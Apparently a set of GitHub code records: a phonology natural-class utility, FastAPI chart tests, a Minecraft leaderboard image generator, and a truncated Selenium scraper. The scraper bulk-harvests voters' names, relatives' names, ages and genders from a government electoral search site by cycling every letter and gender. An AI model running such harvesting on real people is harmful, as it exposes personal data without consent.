input a tuple: (featnames, seglines) see read_feat_file\n\treturns a dictionary with segment name keys and +feat -feat lists as values\n\t{k: [-syll, -cons, -son, +dor, ...], p: [], etc}\n\t'''\n\tfeatnames = featlines[0]\n\tseglines = featlines[1]\n\tsegdict = {}\n\tfor line in seglines:\n\t\tsegdict[line[0]]=[]\n\t\tfor feat in featnames:\n\t\t\tfeatvalue = line[featlines[0].index(feat)+1]\n\t\t\tif not featvalue in ['+', '-', '0']:\n\t\t\t\tkwargs['message']='Your feature file is malformed. Feature values have to be \"+\", \"-\", or \"0\".'\n\t\t\t\tmsg.env_render(**kwargs)\n\t\t\tif not featvalue=='0':\n\t\t\t\tsegdict[line[0]].append(featvalue+feat)\n\treturn segdict\n\n\ndef make_feat_vectors(featlines):\n\t'''\n\ttakes as input a tuple: (featnames, seglines) see read_feat_file\n\treturns a dictionary of feature values along with segments that have those feature values.\n\te.g.,\n{-syll: [k, t, p, w, j, n,...]}\n why is it called \"make_feat_vectors\"? who knows\n\t'''\n\tfeatdict = {}\n\tfor feat in featlines[0]:\n\t\tfeatdict[\"+\"+feat]=[]\n\t\tfeatdict[\"-\"+feat]=[]\n\t\tfeatindex = featlines[0].index(feat)\n\t\tfor line in featlines[1]:\n\t\t\tseg = line[0]\n\t\t\tfeatvalue = line[featindex+1]\n\t\t\tif featvalue==\"+\":\n\t\t\t\tfeatdict['+'+feat].append(seg)\n\t\t\telif featvalue==\"-\":\n\t\t\t\tfeatdict[\"-\"+feat].append(seg)\n\t#drop feature values not associated with seg lists (e.g., -dorsal if dorsal is privative)\n\tfinaldic = {}\n\tfor x in featdict:\n\t\tif featdict[x]:\n\t\t\tfinaldic[x] = featdict[x] \n\treturn finaldic \n\n\n\ndef check_feats(featlines, **kwargs):\n '''\n returns seg and feat value if the feature specifications of one seg are a proper subset of the other. when this holds, the first seg cannot be uniquely identified using its features, so the user should be told.\n '''\n segdict = segs_to_feats(featlines)\n problemsegs = []\n for seg, otherseg in itertools.combinations(segdict.keys(), 2):\n if set(segdict[seg]).issubset(set(segdict[otherseg])):\n problemsegs.append((seg, otherseg))\n if not problemsegs:\n kwargs['message'] = \"\\nThe new feature file is well-formed. all the segments can be uniquely identified.\\n\"\n msg.env_render(**kwargs)\n return True\n else:\n kwargs['message'] = \"\\nThe new feature file does not allow certain segments to be distinguished from each other:\\n\\n\"\n msg.env_render(**kwargs)\n for x in problemsegs:\n kwargs['message']=f'\\n{x[0]} has a subset of the features of {x[1]}'\n msg.env_render(**kwargs)\n return False \n \n \n\ndef get_nat_classes(featlines, **kwargs):\n '''\n takes as input a tuple: (featnames, seglines) see read_feat_file\n returns a dictionary of natural classes as keys, and segments as values\n {-son,+cons: [p, t, n, l, ...]}\n '''\n segdict = segs_to_feats(featlines)\n featdict = make_feat_vectors(featlines)\n #find all pairs of segs that share feature values:\n natclasslist = featdict.keys()\n print(natclasslist)\n for seg in segdict:\n for otherseg in segdict:\n overlap = set(segdict[seg]) & set(segdict[otherseg])\n if len(overlap)>0 and not overlap in natclasslist:\n natclasslist.append(list(overlap))\n natclassdic = {}\n #compile lists of segments that natural classes expand to:\n for cl in natclasslist:\n clname = ','.join(sorted(cl))\n natclassdic[clname]=[]\n #for every seg, check if its feature values are in that natural class description\n for seg in segdict:\n if set(cl).issubset(set(segdict[seg])): \n natclassdic[clname].append(seg)\n kwargs['message']=f'\\nNumber of natural classes: {len(natclassdic)}'\n msg.env_render(**kwargs)\n return natclassdic\n\ndef feat_to_seg_lookup(feats, featdict):\n '''\n given a list of features (feats) and a dictionary of them (featdict), returns all the segs that have that feature combo\n '''\n segs = []\n for feat in feats:\n segs.append(set(featdict[feat]))\n return sorted(list(set.intersection(*segs)))\n\n\n\ndef feats_to_segs_wrapper(feats, featfilepath):\n\t'''\n\ttakes as args a list of features (in any order), and a path to the feature file\n returns a list of segments\n\texample:\n\tpynatclasses.feats_to_segs_wrapper(['-syll', '-son', '+cont'], /home/path/to/feats.txt')\n\tthis is just a wrapper for feat_to_seg_lookup, and it adds the extra step of opening the feature file (so this only happens once per feat line)\n\t'''\n\tfeatdict = make_feat_vectors(read_feat_file(featfilepath))\n\treturn feat_to_seg_lookup(feats, featdict)\n\ndef powerset(thing):\n\t'''\n\tuses itertools recipe for powerset. see python docs\n\t'''\n\tx = list(thing)\n\treturn itertools.chain.from_iterable(itertools.combinations(x, r) for r in range(len(x)+1))\n\ndef which_bigger(featdict, feat1, feat2):\n\t'''\n\tgiven a dictionary mapping features to segment lists, and a couple of feature names, finds out which feature covers a bigger natural class. if they are tied, it will return a boolean False\n\t'''\n\tif len(featdict[feat1])>len(featdict[feat2]):\n\t\treturn feat1\n\telif len(featdict[feat2])>len(featdict[feat1]):\n\t\treturn feat2\n\telse:\n\t\treturn False\n\ndef avg_cl_size(featdict, featlist):\n\t'''\n\tcalculates average number of segs that a class refers to\n\t'''\n\tlenths = [len(featdict[feat]) for feat in featlist]\n\ttry:\n\t\treturn sum(lenths)/len(featlist)\n\texcept ZeroDivisionError:\t\n\t\treturn 1 \n\n\ndef find_shortest_descriptions(natclassdic, featlines):\n\t'''\n\ttakes features from a verbose nat class dictionary, looks to see if there is a shorter subset of features that could describe same class, returns a less verbose dictionary of natural classes \n\t'''\n\tfinaldic = {}\n\tfeatdict = make_feat_vectors(featlines)\n\tfor cl in sorted(natclassdic):\n\t\tsegs = sorted(natclassdic[cl])\n\t\tfeats = sorted(cl.split(','))\n\t\tif len(feats)==1:\n\t\t\tfinaldic[cl]=segs\n\t\telse:\n\t\t\t#takes every sub-combination of features in the verbose dic\n\t\t\t#if any of them picks out an equiv. set of segs, takes the shortest \n\t\t\tequiv_classes = []\n\t\t\tfor featuple in powerset(feats):\n\t\t\t\tif (not len(featuple)==0) and (feat_to_seg_lookup(list(featuple), featdict) == segs):\n\t\t\t\t\tequiv_classes.append(sorted(list(featuple)))\n\t\t\tif len(equiv_classes)==1:\n\t\t\t\tfinaldic[cl] = segs\n\t\t\telse:\n\t\t\t\tlenths = [len(x) for x in equiv_classes]\n\t\t\t\tshortest=[x for x in equiv_classes if len(x)==min(lenths)]\n\t\t\t\tif len(shortest)==1:\n\t\t\t\t\tfinaldic[','.join(shortest[0])]=segs\n\t\t\t\telif len(shortest)>1:\n\t\t\t\t\tcl_sizes = [avg_cl_size(featdict, cl) for cl in equiv_classes]\n\t\t\t\t\t#reward classes for using \"bigger\" features\n\t\t\t\t\tgeneralest = [x for x in equiv_classes if avg_cl_size(featdict, x) == min(cl_sizes)]\n\t\t\t\t\t#and then give up, just give the first if there are ties\n\t\t\t\t\tfinaldic[','.join(generalest[0])]=segs\n\treturn finaldic\n\ndef wrap_classes(featfilepath):\n\t'''\n\ttakes in a full path to a feature file, Features.txt\n returns a dictionary of natural classes, and the segs they contain:\n natclassdict = {'-son,-cont': ['p', 't','k']...}\n\t'''\n\tfeatlines = read_feat_file(featfilepath)\n\treturn find_shortest_descriptions(get_nat_classes(featlines), featlines)\n\n\ndef get_consonants(featfilepath, **kwargs):\n\t'''\n\tgiven a full path to a features.txt file, returns a list of all the symbols that are specified as -syll or -syllabic. Those feature names are special.\n kwargs are passed on to messages module for error handling\n\t'''\n\tfeatlines = read_feat_file(featfilepath)\n\tfeats = make_feat_vectors(featlines)\n\tif '-syll' in feats:\n\t\treturn feats['-syll']\n\telif '-syllabic' in feats:\n\t\treturn feats['-syllabic']\n\telse:\n\t\tkwargs['message']=f'\\nThe feature file {featfilepath.split(\"simulation\")[1]} does not have a column for -syll or -syllabic. The learner needs this feature to separate consonants from vowels. Fix this and try again.'\n\t\tmsg.env_render(**kwargs)\n\ndef get_vowels(featfilepath, **kwargs):\n '''\n first argument is a path to a features.txt file. returns a list of vowel and glide symbols. kwargs are passed to essages module for `error handling\n '''\n featlines = read_feat_file(featfilepath)\n feats = make_feat_vectors(featlines)\n if '+syll' in feats:\n return feats['+syll']\n elif '+syllabic' in feats:\n return feats['+syllabic']\n else:\n msg.env_render(message = 'f\\nThe feature file {featfilepath.split(\"simulation\")[1]} does not have a column for +syll or +syllabic. The learner needs this feature to separate vowels from true consonants. Fix this and try again.', **kwargs)\n\n\n\ndef get_vocoids(featfilepath, **kwargs):\n '''\n first argument is a path to a features.txt file. returns a list of vowel and glide symbols. kwargs are passed to essages module for `error handling\n '''\n featlines = read_feat_file(featfilepath)\n feats = make_feat_vectors(featlines)\n if '-cons' in feats:\n return feats['-cons']\n elif '-consonantal' in feats:\n return feats['-consonantal']\n else:\n msg.env_render(message=f'\\nThe feature file {featfilepath.split(\"simulation\")[1]} does not have a column for -cons or -consonantal. The learner needs this feature to separate vocoids from true consonants. Fix this and try again.', **kwargs)\n\n\ndef outwrite_classes(featfilepath, outpath):\n\t'''\n\tgets natural classes from the file at featfilepath (needs to be a full path, /home/you/etc/Features.txt), and saves natural classes to a file at outpath.\n\t'''\n\timport os\n\tclassdic = wrap_classes(featfilepath)\n\tif not os.path.isfile(outpath):\n\t\twith open(outpath, 'w', encoding='utf-8') as f:\n\t\t\tfor cl in sorted(classdic):\n\t\t\t\tf.write(cl + '\\t' + ','.join(sorted(classdic[cl]))+'\\n')\n\telse:\n\t\toverwrite = input(\"File \" + outpath + \" already exists. Overwrite? [y/n] \")\n\t\tif overwrite=='y':\n\t\t\twith open(outpath, 'w', encoding='utf-8') as f:\n\t\t\t\tfor cl in sorted(classdic):\n\t\t\t\t\tf.write(cl + '\\t' + ','.join(sorted(classdic[cl]))+'\\n')\n\t\telse:\n\t\t\traise SystemExit\n\ndef seglist_to_feats(seglist, segdict):\n\t'''\n\treturns features *not* shared by a list of features.\n\t'''\n\tcontrastfeats = set()\n\tfor seg in seglist:\n\t\tcontrastfeats = contrastfeats.union({x for x in segdict[seg] if not x.startswith('0')})\n\treturn sorted(list({x.lstrip('+-') for x in contrastfeats}))\n\n\ndef make_custom_proj(feats, featfilepath, outpath, **kwargs):\n\t'''\n\tfeats: some feature(s) defining a natural class. e.g., '+son' or '-son,-cont'. If more than 1, must be a comma-separated string. no spaces\n\tfeatfilepath: path to feature file from which to read natural classes.\n\toutpath: where to put projections.txt.\n\tthis function writes a projections file in the format used by Wilson's MaxEnt learner:\n\tprojname feats_defining_class feats_visible_on_proj ngrams\n\tdefault proj always included.\n\tthis is a stand-alone function, it opens the feature file rather than be fed pre-read lines\n\t'''\n\tfeatl = [x.strip() for x in feats.split(',')]\n\tmsg.env_render(message=f'\\n{featl}', **kwargs)\n\tthesegs = feats_to_segs_wrapper(feats, featfilepath)\n\tfeats_to_project = seglist_to_feats(thesegs, read_feat_file(featfilepath)).append('wb')\n\twith open(outpath, 'w', encoding='utf-8') as f:\n\t\tf.write('\\t'.join(['default', 'any', 'all', '3']))\n\t\tf.write('\\t'.join([feats, ''.join(featl), ','.join(feats_to_project), '2', '3']))\n \n\n\nif __name__ == '__main__':\n\timport sys\n\tHelpString = '\\n\\nThis utility finds natural classes in a feature file formatted according to Hayes and Wilson (2009, Linguistic Inquiry) conventions. Basic usage: \\n\\n$ python3 pynatclasses.py /home/full/path/to/file/Features.txt /home/full/path/to/output.txt\\n\\n You can also get all the consonants from a feature file from a command line call: \\n $ python3 pynatclasses.py /home/full/path/to/Features.txt cons\\n\\n This last option requires there being a -syll or -syllabic feature in the file.\\n\\n\\n To see other options, import it into python and try help(pynatclasses)'\n\tCLError = '\\n\\nPlease provide the name of a feature file and a place to save the natural classes to. \\n\\nFor example: \"python3 pynatclasses.py /home/you/Desktop/features.txt /home/you/Desktop/natclasses.txt\"\\n\\n'\n\tbasepath = os.path.dirname(os.path.dirname(os.getcwd()))\n\tif \"--help\" in sys.argv:\n\t\tmsg.env_render(message=HelpString)\n\telif '--check' in sys.argv:\n\t\tfeats = os.path.join(basepath, 'data', sys.argv[1], 'Features.txt')\n\t\tfeatlines = read_feat_file(feats)\n\t\tcheck_feats(featlines)\n\telif '--cus' in sys.argv:\n\t\tfeats = os.path.join(basepath, 'data', sys.argv[1], 'Features.txt')\n\t\tmake_custom_proj(sys.argv[2], feats, '/home/maria/Desktop/projections.txt')\n\telif not \"--cons\" in sys.argv:\n\t\ttry: \n\t\t\tfeats = sys.argv[1]\n\t\t\toutfile = sys.argv[2]\n\t\t\toutwrite_classes(feats, outfile)\n\t\texcept IndexError:\n\t\t\tmsg.env_render(message=CLError)\n\telse:\n\t\ttry:\n\t\t\tget_consonants(sys.argv[1])\n\t\texcept IndexError:\n\t\t\tmsg.env_render(message=\"Please provide a full path to the feature file, like this: \\n $ python3 pynatclasses.py /home/full/path/to/features.txt cons\")\n\n", "repo_name": "gouskova/compsegcode", "sub_path": "code/pynatclasses.py", "file_name": "pynatclasses.py", "file_ext": "py", "file_size_in_byte": 14151, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "messages.env_render", "line_number": 47, "usage_type": "call"}, {"api_name": "messages.env_render", "line_number": 65, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 106, "usage_type": "call"}, {"api_name": "messages.env_render", "line_number": 111, "usage_type": "call"}, {"api_name": "messages.env_render", "line_number": 115, "usage_type": "call"}, {"api_name": "messages.env_render", "line_number": 118, "usage_type": "call"}, {"api_name": "messages.env_render", "line_number": 149, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 179, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 179, "usage_type": "attribute"}, {"api_name": "itertools.combinations", "line_number": 179, "usage_type": "call"}, {"api_name": "messages.env_render", "line_number": 259, "usage_type": "call"}, {"api_name": "messages.env_render", "line_number": 272, "usage_type": "call"}, {"api_name": "messages.env_render", "line_number": 287, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 296, "usage_type": "call"}, {"api_name": "os.path", "line_number": 296, "usage_type": "attribute"}, {"api_name": "messages.env_render", "line_number": 330, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 343, "usage_type": "call"}, {"api_name": "os.path", "line_number": 343, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 343, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 344, "usage_type": "attribute"}, {"api_name": "messages.env_render", "line_number": 345, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 346, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 347, "usage_type": "call"}, {"api_name": "os.path", "line_number": 347, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 347, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 350, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 351, "usage_type": "call"}, {"api_name": "os.path", "line_number": 351, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 351, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 352, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 353, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 355, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 356, "usage_type": "attribute"}, {"api_name": "messages.env_render", "line_number": 359, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 362, "usage_type": "attribute"}, {"api_name": "messages.env_render", "line_number": 364, "usage_type": "call"}]} +{"seq_id": "10695710043", "text": "import sys\nimport pytest\nfrom os.path import exists\nfrom fastapi import FastAPI\nfrom httpx import AsyncClient\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy.sql import text\nfrom AkvoResponseGrouper.cli.generate_schema import generate_schema\nfrom AkvoResponseGrouper.views import (\n get_categories,\n refresh_view,\n)\nfrom models.question import Question, QuestionType\n\nfrom source.main import INSTANCE_NAME\n\npytestmark = pytest.mark.asyncio\nsys.path.append(\"..\")\n\n\nclass TestMigrationCategoryAndNationalData:\n @pytest.mark.asyncio\n async def test_if_views_is_successfully_added(\n self, app: FastAPI, session: Session, client: AsyncClient\n ) -> None:\n schema = generate_schema(\n file_config=f\"./source/{INSTANCE_NAME}/category.json\"\n )\n session.execute(text(schema))\n # check if .category.json was created\n assert exists(\"./.category.json\") is True\n # REFRESH VIEW\n refresh_view(session=session)\n res = get_categories(session=session)\n assert len(res) > 1\n\n @pytest.mark.asyncio\n async def test_get_number_of_school(\n self, app: FastAPI, session: Session, client: AsyncClient\n ):\n res = await client.get(\n app.url_path_for(\"charts:get_number_of_school\"),\n )\n assert res.status_code == 200\n res = res.json()\n assert list(res) == [\"name\", \"total\"]\n\n @pytest.mark.asyncio\n async def test_get_bar_charts_route(\n self, app: FastAPI, session: Session, client: AsyncClient\n ):\n res = await client.get(\n app.url_path_for(\"charts:get_bar_charts\"),\n )\n assert res.status_code == 200\n res = res.json()\n assert list(res[0]) == [\n 'category', 'form', 'options'\n ]\n assert list(res[0][\"options\"][0]) == [\n 'name', 'order', 'color', 'count'\n ]\n # TODO:: Delete\n # assert res == [{\n # 'category': 'Hygiene',\n # 'form': 647170919,\n # 'options': [{\n # 'name': 'Basic',\n # 'color': '#51B453',\n # 'order': 1,\n # 'count': 1\n # }, {\n # 'name': 'Limited',\n # 'color': '#fff176',\n # 'order': 2,\n # 'count': 0\n # }, {\n # 'name': 'No Service',\n # 'color': '#FEBC11',\n # 'order': 3,\n # 'count': 0\n # }]\n # }, {\n # 'category': 'Sanitation',\n # 'form': 647170919,\n # 'options': [{\n # 'name': 'Basic',\n # 'color': '#ab47bc',\n # 'order': 1,\n # 'count': 0\n # }, {\n # 'name': 'Limited',\n # 'color': '#fff176',\n # 'order': 2,\n # 'count': 1\n # }, {\n # 'name': 'No Service',\n # 'color': '#FEBC11',\n # 'order': 3,\n # 'count': 0\n # }]\n # }, {\n # 'category': 'Water',\n # 'form': 647170919,\n # 'options': [{\n # 'name': 'Safely Managed',\n # 'color': '#0080c6',\n # 'order': 1,\n # 'count': 0\n # }, {\n # 'name': 'Basic',\n # 'color': '#00b8ec',\n # 'order': 2,\n # 'count': 0\n # }, {\n # 'name': 'Limited',\n # 'color': '#fff176',\n # 'order': 3,\n # 'count': 1\n # }, {\n # 'name': 'No Service',\n # 'color': '#FEBC11',\n # 'order': 4,\n # 'count': 0\n # }]\n # }]\n\n @pytest.mark.asyncio\n async def test_get_bar_charts_filter_by_name_route(\n self, app: FastAPI, session: Session, client: AsyncClient\n ):\n api_url = app.url_path_for(\"charts:get_bar_charts\")\n res = await client.get(f\"{api_url}?name=Water\")\n assert res.status_code == 200\n res = res.json()\n assert list(res[0]) == [\n 'category', 'form', 'options'\n ]\n assert res[0][\"category\"] == \"Water\"\n assert list(res[0][\"options\"][0]) == [\n 'name', 'order', 'color', 'count'\n ]\n for opt in res[0][\"options\"]:\n assert opt[\"name\"] in [\n 'Safely Managed', 'Basic',\n 'Limited', 'No Service'\n ]\n assert opt[\"color\"] in [\n '#0080c6', '#00b8ec',\n '#fff176', '#FEBC11'\n ]\n # TODO:: Delete\n # assert res == [{\n # 'category': 'Water',\n # 'form': 647170919,\n # 'options': [{\n # 'name': 'Safely Managed',\n # 'color': '#0080c6',\n # 'order': 1,\n # 'count': 0\n # }, {\n # 'name': 'Basic',\n # 'color': '#00b8ec',\n # 'order': 2,\n # 'count': 0\n # }, {\n # 'name': 'Limited',\n # 'color': '#fff176',\n # 'order': 3,\n # 'count': 1\n # }, {\n # 'name': 'No Service',\n # 'color': '#FEBC11',\n # 'order': 4,\n # 'count': 0\n # }]\n # }]\n\n @pytest.mark.asyncio\n async def test_get_national_data_by_question(\n self, app: FastAPI, session: Session, client: AsyncClient\n ):\n questions = session.query(Question)\n question_text = questions.filter(\n Question.type == QuestionType.text).first()\n question_number = questions.filter(\n Question.type == QuestionType.number).first()\n question_option = questions.filter(\n Question.type == QuestionType.option).first()\n # question not found\n res = await client.get(\n app.url_path_for(\n \"charts:get_national_charts_by_question\",\n question=12345\n )\n )\n assert res.status_code == 404\n # not number, multiple, option question\n res = await client.get(\n app.url_path_for(\n \"charts:get_national_charts_by_question\",\n question=question_text.id\n )\n )\n assert res.status_code == 404\n # number question\n res = await client.get(\n app.url_path_for(\n \"charts:get_national_charts_by_question\",\n question=question_number.id\n )\n )\n assert res.status_code == 200\n res = res.json()\n assert list(res) == ['name', 'total', 'count']\n # option question\n res = await client.get(\n app.url_path_for(\n \"charts:get_national_charts_by_question\",\n question=question_option.id\n )\n )\n assert res.status_code == 200\n res = res.json()\n assert list(res) == ['name', 'option']\n assert list(res['option'][0]) == [\n 'name', 'order', 'color', 'description', 'count'\n ]\n", "repo_name": "akvo/siwins", "sub_path": "backend/tests/test_090_category_and_national_data.py", "file_name": "test_090_category_and_national_data.py", "file_ext": "py", "file_size_in_byte": 7237, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pytest.mark", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "fastapi.FastAPI", "line_number": 24, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 24, "usage_type": "name"}, {"api_name": "httpx.AsyncClient", "line_number": 24, "usage_type": "name"}, {"api_name": "AkvoResponseGrouper.cli.generate_schema.generate_schema", "line_number": 26, "usage_type": "call"}, {"api_name": "source.main.INSTANCE_NAME", "line_number": 27, "usage_type": "name"}, {"api_name": "sqlalchemy.sql.text", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 31, "usage_type": "call"}, {"api_name": "AkvoResponseGrouper.views.refresh_view", "line_number": 33, "usage_type": "call"}, {"api_name": "AkvoResponseGrouper.views.get_categories", "line_number": 34, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 22, "usage_type": "attribute"}, {"api_name": "fastapi.FastAPI", "line_number": 39, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 39, "usage_type": "name"}, {"api_name": "httpx.AsyncClient", "line_number": 39, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 37, "usage_type": "attribute"}, {"api_name": "fastapi.FastAPI", "line_number": 50, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 50, "usage_type": "name"}, {"api_name": "httpx.AsyncClient", "line_number": 50, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 48, "usage_type": "attribute"}, {"api_name": "fastapi.FastAPI", "line_number": 130, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 130, "usage_type": "name"}, {"api_name": "httpx.AsyncClient", "line_number": 130, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 128, "usage_type": "attribute"}, {"api_name": "fastapi.FastAPI", "line_number": 181, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 181, "usage_type": "name"}, {"api_name": "httpx.AsyncClient", "line_number": 181, "usage_type": "name"}, {"api_name": "models.question.Question", "line_number": 183, "usage_type": "argument"}, {"api_name": "models.question.Question.type", "line_number": 185, "usage_type": "attribute"}, {"api_name": "models.question.Question", "line_number": 185, "usage_type": "name"}, {"api_name": "models.question.QuestionType.text", "line_number": 185, "usage_type": "attribute"}, {"api_name": "models.question.QuestionType", "line_number": 185, "usage_type": "name"}, {"api_name": "models.question.Question.type", "line_number": 187, "usage_type": "attribute"}, {"api_name": "models.question.Question", "line_number": 187, "usage_type": "name"}, {"api_name": "models.question.QuestionType.number", "line_number": 187, "usage_type": "attribute"}, {"api_name": "models.question.QuestionType", "line_number": 187, "usage_type": "name"}, {"api_name": "models.question.Question.type", "line_number": 189, "usage_type": "attribute"}, {"api_name": "models.question.Question", "line_number": 189, "usage_type": "name"}, {"api_name": "models.question.QuestionType.option", "line_number": 189, "usage_type": "attribute"}, {"api_name": "models.question.QuestionType", "line_number": 189, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 179, "usage_type": "attribute"}]} +{"seq_id": "3661359863", "text": "import datetime\nfrom PIL import Image, ImageDraw, ImageFont\n\ndef get_text_dimensions(text_string, font):\n # https://stackoverflow.com/a/46220683/9263761\n ascent, descent = font.getmetrics()\n\n text_width = font.getmask(text_string).getbbox()[2]\n text_height = font.getmask(text_string).getbbox()[3] + descent\n\n return (text_width, text_height)\n\ndef generate_image(collection, rank):\n \"\"\"\n Generates an image displaying the amount of collected\n redstone and the leaderboard rank of the player.\n \"\"\"\n\n # Setup\n image = Image.new(mode = \"RGB\", size=(1200,160), color=\"black\")\n draw = ImageDraw.Draw(image)\n\n # Fonts\n font_lg = ImageFont.truetype('minecraft.ttf', 56)\n font_sm = ImageFont.truetype('minecraft.ttf', 28)\n\n # Text segments\n text = [\n (\"Redstone:\", \"#aaaaaa\", \"#555555\"),\n (\"_\", \"#000000\", \"#000000\"),\n (format(collection, \",\"), \"#55ff55\", \"#005500\"),\n (\"_\", \"#000000\", \"#000000\"),\n (\"(\", \"#aaaaaa\", \"#555555\"),\n (f\"# {rank}\", \"#55ffff\", \"#005555\"),\n (\")\", \"#aaaaaa\", \"#555555\"),\n ]\n\n # Draw each segment of text\n x = 28\n margin = 8\n offset = 7\n for text, color, dark_color in text:\n draw.text((x + offset, 28 + offset), text, fill=dark_color, font=font_lg)\n draw.text((x, 28), text, fill=color, font=font_lg)\n w, h = get_text_dimensions(text, font=font_lg)\n x = x + w + margin\n\n # Draw the current time, formatted\n lastupdated = datetime.datetime.now(datetime.timezone(datetime.timedelta(hours=-4))).strftime(\"%B %d, %Y, %I:%M:%S %p EDT\").replace(\" \", \" \")\n draw.text((28, 108), f\"Last Updated: {lastupdated}\", fill=\"#aaaaaa\", font=font_sm)\n\n return image\n", "repo_name": "SoshJam/redstone-collection-signature", "sub_path": "imagegen.py", "file_name": "imagegen.py", "file_ext": "py", "file_size_in_byte": 1733, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "PIL.Image.new", "line_number": 20, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 20, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 21, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 21, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 24, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 24, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 25, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 25, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 49, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "36550411017", "text": "from bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport re\nimport time\nimport simplejson as json\nimport json\nimport getpass\nfrom selenium.common.exceptions import NoSuchElementException\nimport numpy as np\nimport collections\nfrom collections import OrderedDict\nimport string\nimport io\n##################################################################\n\ndef Get_Data(base_url,city,username,gender,value):\t\t# Extracts table data\n\tdriver=webdriver.PhantomJS()\n\tdriver.get(base_url)\n\tdriver.find_element_by_xpath(\"//select[@id='ddlDistricts']//option[@value='\"+city+\"']\").click()\n\ttime.sleep(2)\n\tdriver.find_element_by_id('RdlSearchBy_1')\n\tdriver.find_element_by_xpath(\"//input[@id='RdlSearchBy_1']\").click()\n\tname=driver.find_element_by_id('txtFirstName')\n\t#username=input(\"Enter the name character:\\n\")\n\tfor char in username:\n\t\tname.send_keys(char)\n\n\tdriver.find_element_by_xpath(\"//select[@id='ddlGender']//option[@value='\"+gender+\"']\").click()\n\tdriver.find_element_by_id('Button1').click()\n\ttime.sleep(1)\n\telements=driver.find_elements_by_xpath(\"//table[@id='gvSearchResult']/tbody/tr/th\")\n\tColumn_Names=[]\n\tfor elm in elements:\n\t\tColumn_Names.append(elm.text)\n\tColumn_Names=Column_Names[5:11]\n\tList=[]\n\tLink_List=[]\n\t\n\tRecord={}\n\tlinks=driver.find_elements_by_xpath(\"//table[@id='gvSearchResult']/tbody/tr/td//table/tbody/tr/td/a\")\n\tfor link in links:\n\t\tLink_List.append(link.get_attribute('href'))\n\t\n\telements=driver.find_elements_by_xpath(\"//table[@id='gvSearchResult']/tbody/tr\")\n\tfor elm in elements:\n\t\tList.append(elm.find_elements_by_tag_name(\"td\")[5:11])\n\tfor i in List:\n\t\tfor j in i:\n\t\t\tvalue.append(j.text)\n\tdriver.close()\n\n\ndef Crawl_City(city):\t\t# records the data in suitable format by transforming and saving in JSON format\n\tpath=\"/home/subir_sbr/Desktop/\" ## set the local path\n\tchar=list(string.ascii_lowercase)\n\tgender=['M','F','O']\t\t# Gender O stands for TransGender\n\tvalue=[]\n\tbase_url=\"http://164.100.180.82/searchengine/SearchEngineEnglish.aspx\"\n\n\tfor g in gender:\n\t\tfor c in char:\n\t\t\tprint(\"Extracting Details for name with char %s of gender %s\"% (c,g))\n\t\t\tGet_Data(base_url,city,c,g,value)\t# getting data for different gender and name character\n\t\t\tprint(len(value))\n\n\tColumn_Names=['First Name', 'Name (Hindi)', \"Father/Husband's Name\", \"Father/Husband's Name (Hindi)\", 'Age', 'Gender']\t\n\tmyarray=np.asarray(value)\n\tm=len(myarray)\n\tn=len(Column_Names)\n\tmyarray.resize(m/n,n)\n\tdetails =myarray.tolist()\n\tCompleteDict={}\n\tRecord={}\n\tfinalDict={}\n\tCompleteDict=collections.OrderedDict(CompleteDict)\n\tRecord=collections.OrderedDict(Record)\n \n\tfor i in range(len(details)):\n\t\tfor j in range(len(Column_Names)):\n\t\t\tRecord[Column_Names[j]]=details[i][j]\n\t\tCompleteDict[i]=dict(Record)\t# final dictionay having all the data\n\n\twith 